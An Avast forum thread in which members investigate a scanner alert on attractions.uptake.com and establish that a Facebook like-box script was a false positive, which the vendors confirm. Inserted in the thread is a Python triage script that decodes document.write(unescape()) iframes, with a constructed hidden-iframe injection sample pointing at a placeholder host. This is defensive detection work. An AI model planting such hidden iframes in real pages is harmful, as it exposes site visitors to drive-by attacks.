Author Topic: [SOLVED] attractions.uptake.com ~New Threat?~  (Read 5413 times)


Offline !Donovan

  • Web Analyst
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 2220
    • The WAR Against Malware
[SOLVED] attractions.uptake.com ~New Threat?~
« on: November 30, 2011, 11:25:45 PM »
I was doing some research for my project when I stumbled upon this site. VirusTotal reported Avira only detected it as showed here:
http://www.virustotal.com/file-scan/report.html?id=6a211a33e80eb62f4ef1b96f0574d06ac94082cf1b5f4defe1ce4bd14f594832-1322690872

Sucuri also says it contains malware:
web site:    attractions(DOT)uptake(DOT)com
status:    Site infected with malware
web trust:     Not Blacklisted
warn:    Wordpress version outdated: Upgrade required.

Known javascript malware.
Details: -http://sucuri.net/malware/entry/MW:IFRAME:HD5

Code:
document.write(unescape('%3Ciframe src="http://www.facebook.com/plugins/like.php?href=' + thispageURL + ...
Donovansrb10
« Last Edit: December 03, 2011, 03:33:44 PM by Donovansrb10 »
Familiarize Yourself! | Educate Yourself! | Beautify Yourself! | Scan Yourself!
"People who say it cannot be done should not interrupt those who are doing it."

Offline doug_uptake

  • Newbie
  • *
  • Posts: 1
Re: attractions.uptake.com ~New Threat?~
« Reply #1 on: December 01, 2011, 12:50:46 AM »
I am a developer at uptake.com.  Can you give me some details on the exact url where you found this?  I assume it is a post somewhere at http://attractions.uptake.com/blog/*.

We would like to

1) Scrub the code, understand how it was injected, take steps to keep it from happening again.
2) Upgrade our version of Wordpress if necessary.

Thanks,
Doug Seifert
Uptake Networks, Inc.

Offline Pondus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 36047
Re: attractions.uptake.com ~New Threat?~
« Reply #2 on: December 01, 2011, 01:02:47 AM »
Quote
Can you give me some details on the exact url where you found this?
he already has ::)
Chief Wiggum: Uh, no, you got the wrong number. This is 9-1…2.


Offline !Donovan

Re: attractions.uptake.com ~New Threat?~
« Reply #3 on: December 01, 2011, 04:38:02 AM »
1) Scrub the code, understand how it was injected, take steps to keep it from happening again.
2) Upgrade our version of Wordpress if necessary.

You can upgrade Wordpress to reduce the risk of having the site hijacked again.

Offline polonus

  • Avast Überevangelist
  • Maybe Bot
  • *****
  • Posts: 31659
  • malware fighter
Re: attractions.uptake.com ~New Threat?~
« Reply #4 on: December 01, 2011, 04:49:48 PM »
Hi doug_uptake,

Follow Donovansrb10's advice and update your website software to avoid and reduce the chance of re-infection.
Also pay attention to this code that was flagged as suspicious:
-uptake-blogs.s3.amazonaws.com/themes/uptake4/javascripts/site.js suspicious
[suspicious:2] (ipaddr:72.21.211.171) (script) -uptake-blogs.s3.amazonaws.com/themes/uptake4/javascripts/site.js
     status: (referer=-attractions.uptake.com/blog/)saved 80392 bytes ce100fa33adfe4728c9002e13cf26a7d867940d1
     info: [javascript variable] URL=
     info: [javascript variable] URL=-boss.yahooapis.com/ysearch/images/v1/
     info: [javascript variable] URL=-api.search.live.net/json.aspx?appid=
     info: [img] -uptake-blogs.s3.amazonaws.com/themes/uptake4/javascripts/
     info: [decodingLevel=0] found JavaScript
     error: undefined variable jQuery
     error: undefined variable $.event
     error: line:1: SyntaxError: missing ; before statement:
          error: line:1: var $.event = 1;
          error: line:1: ....^
     suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

Re: attractions.uptake.com ~New Threat?~
« Reply #5 on: December 01, 2011, 07:56:36 PM »
Hi Donovansrb10,

Make that link to -http://sucuri.net/malware/malware-entry-mwiframehd5 non-click-through, please, because the avast Webshield flags HTML:iFrame-EE[Trj] and rightly so. Even at descriptions of malcode or look-ups the avast shields may sound the alarm as the non-munged code example gets recognized, notwithstanding the fact that it does not infect from there. Similar happened to me on several occasions when visiting the jsunpack online service to analyze script or trying to open a particular piece of malcode on a URL through my malzilla browser. We know why this is, my friend, but the unaware forum visitor who clicks that description link may panic because he does not understand the avast shield reaction,

polonus

Offline spg SCOTT

  • Massive Poster
  • ****
  • Posts: 4130
  • There is no magic, only lost physics
    • spg SCOTT
Re: attractions.uptake.com ~New Threat?~
« Reply #6 on: December 01, 2011, 08:16:59 PM »
Why does Sucuri alert on a facebook like box?

Especially as the malware entry that it links to is nothing to do with FB.

The MW:IFRAME:HD5 code on the page decodes to something completely unrelated.

“There is a computer disease that anybody who works with computers knows about. It's a very serious disease and it interferes completely with the work. The trouble with computers is that you 'play' with them!” (Richard Feynman)

Offline Pondus

Re: attractions.uptake.com ~New Threat?~
« Reply #7 on: December 01, 2011, 09:48:10 PM »
Norman lab
Quote
attractions.uptake.com.htm - Clean!


Offline Pondus

Re: attractions.uptake.com ~New Threat?~
« Reply #9 on: December 01, 2011, 11:04:36 PM »
was going to post a FP case at Avira but the web seems down at the moment.....


Offline polonus

Re: attractions.uptake.com ~New Threat?~
« Reply #10 on: December 01, 2011, 11:52:19 PM »
Hi Pondus and spg SCOTT,

I do not see any iFrame that goes to -nuotoll.com,
see:  http://www.google.com/safebrowsing/diagnostic?site=nuotoll.com/   as spg SCOTT pointed out in the image from SUCURI that he provided for us. For nuotoll dot com Unmask Parasites informs that under certain circumstances third parties could add malicious code to legit sites, for which Google Safe Browsing delivers this alert,

polonus

Offline spg SCOTT

Re: attractions.uptake.com ~New Threat?~
« Reply #11 on: December 02, 2011, 12:20:52 AM »
My point exactly. Sucuri highlights a facebook like button script as a malicious iframe.

It is not similar in any way.

Is there a way to report something like this to Sucuri?
« Last Edit: December 02, 2011, 01:17:32 AM by spg SCOTT »
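The disagreement in the posts above (Sucuri flagging the Facebook like box's document.write(unescape('%3Ciframe ...')) snippet as MW:IFRAME:HD5) comes down to a signature keying on the writing pattern rather than on what the decoded iframe actually is. The Python below is an added example, not code from this thread, from Sucuri or from Uptake: it shows the triage step a site owner or analyst would run before trusting such a verdict, namely reconstruct what document.write(unescape(...)) would emit, parse the iframe it produces, and separate a visible, allowlisted social widget from a hidden iframe of the kind the signature exists for. The allowlist, the two sample snippets (the page shows only the start of the like-box code; the remainder is constructed here in the widget's usual shape) and the placeholder domain malicious.example are assumptions made for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Hosts whose embedded iframes are expected on a blog page (constructed
# allowlist for this example; a real deployment maintains its own).
KNOWN_WIDGET_HOSTS = {"www.facebook.com", "platform.twitter.com"}

# document.write(unescape( <argument> )) -- the writing pattern a signature keys on.
DOC_WRITE_RE = re.compile(r"document\.write\s*\(\s*unescape\s*\((.*?)\)\s*\)", re.DOTALL)
# JS string literals inside that argument; anything between them is a
# concatenated expression such as "+ thispageURL +".
JS_STRING_RE = re.compile(r"'((?:[^'\\]|\\.)*)'|\"((?:[^\"\\]|\\.)*)\"")
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def js_unescape(s: str) -> str:
    """Approximate JavaScript's unescape(): %uXXXX sequences first, then %XX."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


def rebuild_written_html(argument: str) -> str:
    """Join the string literals of the unescape() argument, marking any
    non-literal (variable) piece as {expr} so the markup stays parseable."""
    parts, last_end = [], 0
    for m in JS_STRING_RE.finditer(argument):
        if argument[last_end:m.start()].strip(" +\n\t"):
            parts.append("{expr}")
        parts.append(m.group(1) if m.group(1) is not None else m.group(2))
        last_end = m.end()
    return js_unescape("".join(parts))


def is_hidden(attrs: dict) -> bool:
    """Heuristics for an iframe meant not to be seen: zero/one-pixel size or a
    style that hides it. A visible social widget fails all of these."""
    for dim in ("width", "height"):
        v = attrs.get(dim, "").strip().rstrip("px")
        if v.isdigit() and int(v) <= 1:
            return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return "display:none" in style or "visibility:hidden" in style


def triage(source: str) -> list:
    """Find document.write(unescape(...)) calls, decode them and classify each
    iframe they would emit. Returns one dict per iframe found."""
    findings = []
    for m in DOC_WRITE_RE.finditer(source):
        html = rebuild_written_html(m.group(1))
        for tag in IFRAME_RE.finditer(html):
            attrs = {}
            for a in ATTR_RE.finditer(tag.group(1)):
                attrs[a.group(1).lower()] = next(v for v in a.groups()[1:] if v is not None)
            src = attrs.get("src", "")
            host = urlsplit(src).hostname or ""
            if is_hidden(attrs):
                verdict = "hidden-iframe"   # the shape an injected iframe takes
            elif host in KNOWN_WIDGET_HOSTS:
                verdict = "known-widget"    # e.g. the Facebook like box: a false positive
            else:
                verdict = "review"          # visible but of unknown origin: inspect by hand
            findings.append({"src": src, "host": host, "verdict": verdict})
    return findings


# Constructed samples. The first follows the like-box snippet the thread quotes
# (only its start is on the page; the rest is made up in the widget's usual
# shape). The second is a constructed hidden iframe pointing at a placeholder.
BENIGN_LIKE_BOX = (
    "var thispageURL = encodeURIComponent(document.location.href);\n"
    "document.write(unescape('%3Ciframe src=\"http://www.facebook.com/plugins/like.php?href=' "
    "+ thispageURL + '&amp;layout=button_count&amp;width=100&amp;height=21\" "
    "scrolling=\"no\" frameborder=\"0\" style=\"border:none; width:100px; height:21px;\""
    "%3E%3C/iframe%3E'));"
)
INJECTED_IFRAME = (
    "document.write(unescape('%3Ciframe src=\"http://malicious.example/in.php\" "
    "width=\"1\" height=\"1\" style=\"visibility:hidden\"%3E%3C/iframe%3E'));"
)

if __name__ == "__main__":
    for f in triage(BENIGN_LIKE_BOX + "\n" + INJECTED_IFRAME):
        print(f"{f['verdict']:14} {f['host']:22} {f['src']}")
```

Run against a saved copy of the page or theme script, the like box comes back as known-widget and the hidden one-pixel iframe as hidden-iframe; anything landing in review is what deserves the manual look the posters here did by going to the code directly.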

Offline polonus

Re: attractions.uptake.com ~New Threat?~
« Reply #12 on: December 02, 2011, 12:41:20 AM »
Hi spg SCOTT,

I assume you could give a reaction on the blog they have going: http://blog.sucuri.net/
It qualifies somewhere under misdetection or false positive. At least it needs explanation.
I see sucuri as one of the better website monitoring scanning services, but they also meet with mistakes, omissions and have to clean out their daily dirt. Never take any detection for granted, always check with other scanners or go directly to the code as you do. That is the lesson we can take here.
Thank you very much, spg SCOTT, for diving into this issue and for the insight gained.
But we also should praise the young Donovansrb10 for starting this thread on this apparent new threat here. He sort of has put his HTML-homework to a good purpose if he stumbled upon a sucuri misdetection,

polonus

 
« Last Edit: December 02, 2011, 12:56:43 AM by polonus »

Offline spg SCOTT

Re: attractions.uptake.com ~New Threat?~
« Reply #13 on: December 02, 2011, 08:04:09 PM »
I found a contact email, and sent them an email. In under 30 minutes, I received this.

Not only is the scanning service very useful, they are very quick once notified :)

Scott

Quote
Hi Scott,

Thanks for sending the link to us. It is indeed a false positive and the scanner was fixed already, so it will not alert on it anymore.

Sorry for the confusion.

Thanks,


Offline Pondus

Re: attractions.uptake.com ~New Threat?~
« Reply #14 on: December 02, 2011, 09:54:25 PM »
and from Avira lab
Quote
The file 'attractions.uptake.com.htm' has been determined to be 'FALSE POSITIVE'. In particular this means that this file is not malicious but a false alarm. Our analysts named the threat HTML/Rce.Gen. The term "HTML/" denotes a script-virus that is able to infect the system using a HTML script. Detection will be removed from our virus definition file (VDF) with one of the next updates.